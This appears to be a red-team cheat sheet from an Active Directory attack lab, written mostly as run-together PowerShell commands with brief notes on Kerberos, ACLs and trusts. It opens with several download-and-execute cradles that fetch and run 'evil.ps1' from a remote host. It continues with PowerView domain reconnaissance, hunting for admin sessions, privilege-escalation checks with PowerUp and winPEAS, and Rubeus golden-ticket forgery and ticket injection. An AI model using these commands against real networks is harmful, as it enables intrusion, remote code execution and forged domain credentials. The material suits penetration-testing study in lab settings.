#Load Powershell script.C:\script.ps1#Import module or scriptImport-Module C:\script.ps1#List all commands in moduleGet-Command-Module modulename#Download execute cradleiex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')$ie=New-Object-ComObjectInternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response#PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')$h=New-Object-ComObjectMsxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex$h.responseText#Download execute cradle$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")$r = $wr.GetResponse()IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()---- Recon ----#Get domainGet-ADDomain#Get object of another domainGet-Domain-Domain moneycorp.local (Powerview)Get-ADDomain-Identity moneycorp.local (AD Module)#Get domain SID for the current domainGet-DomainSID (Powerview)(Get-ADDomain).DomainSID (AD Module)#Get domain policy for the current domainGet-DomainPolicyData(Get-DomainPolicyData).systemaccess#Get domain policy for another domain(Get-DomainPolicyData-domainmoneycorp.local).systemaccess#Get domain controllers for the current domainGet-DomainControllerGet-ADDomainController#Get domain controllers for another domainGet-DomainController-Domain moneycorp.localGet-ADDomainController-DomainName moneycorp.local -Discover#Get a list of users in the current domainGet-DomainUserGet-DomainUser-Identity student1Get-ADUser-Filter *-Properties *Get-ADUser-Identity student1 -Properties *Get-ADUser-Filter *-Properties *| select name,MemberOf | fl *#Get list of all properties for users in the current domainGet-DomainUser-Identity student1 -Properties *Get-DomainUser-Properties samaccountname,logonCountGet-ADUser-Filter *-Properties *| select -First 1|Get-Member-MemberType *Property | select NameGet-ADUser-Filter *-Properties *| select name,logoncount,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}#Search for a particular string in a user's attributes:Get-DomainUser-LDAPFilter "Description=*built*"| Select name,DescriptionGet-ADUser-Filter 'Description -like "*built*"'-Properties Description | select name,Description#Get a list of computers in the current domainGet-DomainComputer| select NameGet-DomainComputer-OperatingSystem "*Server 2022*"Get-DomainComputer-PingGet-ADComputer-Filter *| select NameGet-ADComputer-Filter *-Properties *Get-ADComputer -Filter 'OperatingSystem -like "*Server 2022*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer-Filter *| select name, DistinguishedNameGet-ADComputer-Filter *-Properties *| select name,logonCountGet-ADComputer-Filter *-Properties DNSHostName |%{Test-Connection-Count 1-ComputerName $_.DNSHostName}#Get all the groups in the current domainGet-DomainGroup| select NameGet-DomainGroup-Domain <targetdomain>Get-ADGroup-Filter *| select NameGet-ADGroup-Filter *-Properties *#Get all groups containing the word "admin" in group nameGet-DomainGroup*admin*Get-ADGroup-Filter 'Name -like "*admin*"'| select Name#Get all the members of the Domain Admins groupGet-DomainGroupMember-Identity "Domain Admins"-RecurseGet-ADGroupMember-Identity "Domain Admins"-Recursive#Get the group membership for a user:Get-DomainGroup-UserName "student1"Get-ADPrincipalGroupMembership-Identity student1#List all the local groups on a machine (needs administrator privs on non-dc#machines) :Get-NetLocalGroup-ComputerName dcorp-dc#Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines) :Get-NetLocalGroupMember-ComputerName dcorp-dc -GroupName Administrators#Get actively logged users on a computer (needs local admin rights on the target)Get-NetLoggedon-ComputerName dcorp-adminsrv#Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)Get-LoggedonLocal-ComputerName dcorp-adminsrv#Get the last logged user on a computer (needs administrative rights and remote registry on the target)Get-LastLoggedOn-ComputerName dcorp-adminsrv#Find shares on hosts in current domain.Invoke-ShareFinder-Verbose#Find sensitive files on computers in the domainInvoke-FileFinder-Verbose#Get all fileservers of the domainGet-NetFileServer#Get list of GPO in current domain.Get-DomainGPOGet-DomainGPO-ComputerIdentity dcorp-student1#Get GPO(s) which use Restricted Groups or groups.xml for interesting usersGet-DomainGPOLocalGroup#Get users which are in a local group of a machine using GPOGet-DomainGPOComputerLocalGroupMapping-ComputerIdentity dcorp-student1#Get machines where the given user is member of a specific groupGet-DomainGPOUserLocalGroupMapping-Identity student1 -Verbose#Get OUs in a domainGet-DomainOUGet-ADOrganizationalUnit-Filter *-Properties *#Get GPO applied on an OU. Read GPOname from gplink attribute fromGet-NetOUGet-DomainGPO-Identity "{0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E}"#Get the ACLs associated with the specified objectGet-DomainObjectAcl-SamAccountName student1 -ResolveGUIDs#Get the ACLs associated with the specified prefix to be used for searchGet-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
#We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs(Get-Acl'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access#Search for interesting ACEsFind-InterestingDomainAcl-ResolveGUIDsFind-InterestingDomainAcl-ResolveGUIDs |?{$_.IdentityReferenceName-match"student1"-and}#Get the ACLs associated with the specified pathGet-PathAcl-Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"#Get a list of all domain trusts for the current domainGet-DomainTrustGet-DomainTrust-Domain us.dollarcorp.moneycorp.localGet-ADTrustGet-ADTrust-Identity us.dollarcorp.moneycorp.local#Get details about the current forestGet-ForestGet-Forest-Forest eurocorp.localGet-ADForestGet-ADForest-Identity eurocorp.local#Get all domains in the current forestGet-ForestDomainGet-ForestDomain-Forest eurocorp.local(Get-ADForest).Domains#External Trusts:Get-ForestDomain-Forest eurocorp.local |%(Get-DomainTrust-Domain $_.Name)Get-ForestDomain|%(Get-DomainTrust-Domain $_.Name) |?{$_.TrustAttributes-eq"FILTER_SIDS"#Get all global catalogs for the current forestGet-ForestGlobalCatalogGet-ForestGlobalCatalog-Forest eurocorp.localGet-ADForest| select -ExpandProperty GlobalCatalogs#Map trusts of a forest (no Forest trusts in the lab)Get-ForestTrustGet-ForestTrust-Forest eurocorp.localGet-ADTrust-Filter 'msDS-TrustForestTrustInfo -ne "$null"'#Find all machines on the current domain where the current user has local admin accessFind-LocalAdminAccess-Verbose#Find computers where a domain admin (or specified user/group) has sessions:Find-DomainUserLocation-VerboseFind-DomainUserLocation-UserGroupIdentity "RDPUsers"#Find computers where a domain admin (or specified user/group) has sessions:Find-DomainUserLocation-VerboseFind-DomainUserLocation-UserGroupIdentity "RDPUsers"#Find computers where a domain admin session is available and current user has admin access (uses Test-AdminAccess).Find-DomainUserLocation-CheckAccess#Find computers (File Servers and Distributed File servers) where a domain admin session is available.Find-DomainUserLocation-Stealth#List sessions on remote machines (https://github.com/Leo4j/Invoke-SessionHunter) Command doesn’t need admin access on remote machines. Uses Remote Registry and queries HKEY_USERS hive.
Invoke-SessionHunter-FailSafe#An opsec friendly command would beInvoke-SessionHunter-NoPortScan -Targets C:\AD\Tools\servers.txt#Get services with unquoted paths and a space in their name.Get-ServiceUnquoted-Verbose#Get services where the current user can write to its binary path or change arguments to the binaryGet-ModifiableServiceFile-Verbose#Get the services whose configuration current user can modify.Get-ModifiableService-Verbose#PowerUpInvoke-AllChecks#Privesc:Invoke-PrivEsc#PEASS-ng:winPEASx64.exe---- Rubeus -----#Forge TGT with golden ticket:Rubeus.exe golden /aes256:asdasd /user:nlamb /domain:dasda /sid:2357301523/nowrap#Inject forged TGT into process (Only creates type 9 logon):Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
Enterprise Admin group have complete control of the entire forest (all the domains in the forest) where as the Domain Admins have access only to their specific domain.
Ticket-based, for secure nodes communication over non-secure network, domain
NtLmSsp
NT Lan Manager Hash-based – used locally
Overpass the hash:
Uses an NTLM hash to grab kerberous ticket.
Will sometimes result in RC4 TGT being requested if TA doesn't specify where encryption type.
4624 – An account was successfully logged on. (Logon type = 9 Logon Process = Seclogo)
ACLs:
Access Control List (ACL)
It is a list of Access Control Entries (ACE) - ACE corresponds to individual permission or audits access. Who has permission and what can be done on an object?
Two types: –
DACL - Defines the permissions trustees (a user or group) have on an object.
Discretionary Access Control List
SACL - Logs success and failure audit messages when an object is accessed.
system access control list
ACLs are vital to security architecture of AD.
ACE:
An ACE is an access control entry in an access control list (ACL)
It is created automatically between the new domain and the domain that precedes it in the namespace hierarchy, whenever a new domain is added in a tree. For example, dollarcorp.moneycorp.local is a child of moneycorp.local
This trust is always two-way transitive.
Tree-root trust:
It is created automatically between whenever a new domain tree is added to a forest root.
This trust is always two-way transitive.
Forrest trusts:
Non-transitive
Forest 1 can access forest 2, but cannot access forest 3.
